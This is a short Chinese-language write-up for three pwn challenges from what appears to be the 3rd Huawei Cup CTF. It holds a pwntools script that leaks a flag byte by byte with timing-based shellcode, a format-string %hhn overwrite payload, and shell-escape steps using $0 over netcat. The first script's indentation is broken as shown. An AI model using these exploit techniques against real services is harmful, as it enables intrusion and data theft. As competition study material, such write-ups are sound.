第三届华为杯

NoooCall

这个要 用shellcode 字节对比。

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

import sys

from string import printable

context(arch='amd64',os='linux',endian='little')

#context.log_level = 'debug'

host = "192.168.244.161"

port = 8888

#host = '121.36.64.245'

#port = 10003

 

def expolit(c,i):

    time_start=time.time()

    r = remote(host,port)

    #payload = '''and rdi,0x1

    #mov rsi,[rbp-32]

    #push 0x1

    #pop rax

    #syscall'''

    payload ='''mov bl,%d

    mov rax,[rbp-32]

    add al,%d

    cmp byte ptr [rax],bl

    jz crash

    ret

    crash:

    jmp $

            '''%(c,i)

    r.recvuntil("Your Shellcode >>")

    #raw_input()

    r.send(asm(payload))

    

    try:

        r.recv(timeout=1)

    except:

        #log.info('sysyssss')

        return 555555

    return c

flag=''

nn=0

for nn in range(0,32):

    for i in printable:

s=expolit(ord(i),nn)

if s==555555:

    continue

else:

    flag=flag+i

    if i=='}':

        print flag

                sys.exit(0)

    log.info(flag)

    #raw_input()

    break

format

就是一个简单的格式化漏洞

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'

host = "192.168.244.161"

port = 8888 

#r = process("")

r = remote(host,port)

def rsl(c1,c2):

    r.recvuntil(c1)

    r.sendline(c2)

 

def rs(c1,c2):

    r.recvuntil(c1)

    r.send(c2)

 

r.recvuntil("...
")

r.recvuntil("...
")

#raw_input()

payload = '%188c%10$hhn|%171c%18$hhn|%189c%10$hhn|%133c%18$hhn'

r.send(payload.ljust(0x37,'x00')) 

r.interactive()

 

Shellmaster

用nc连上

然后 $0 进入当前的shell

然后ls

然后 ./flag >&1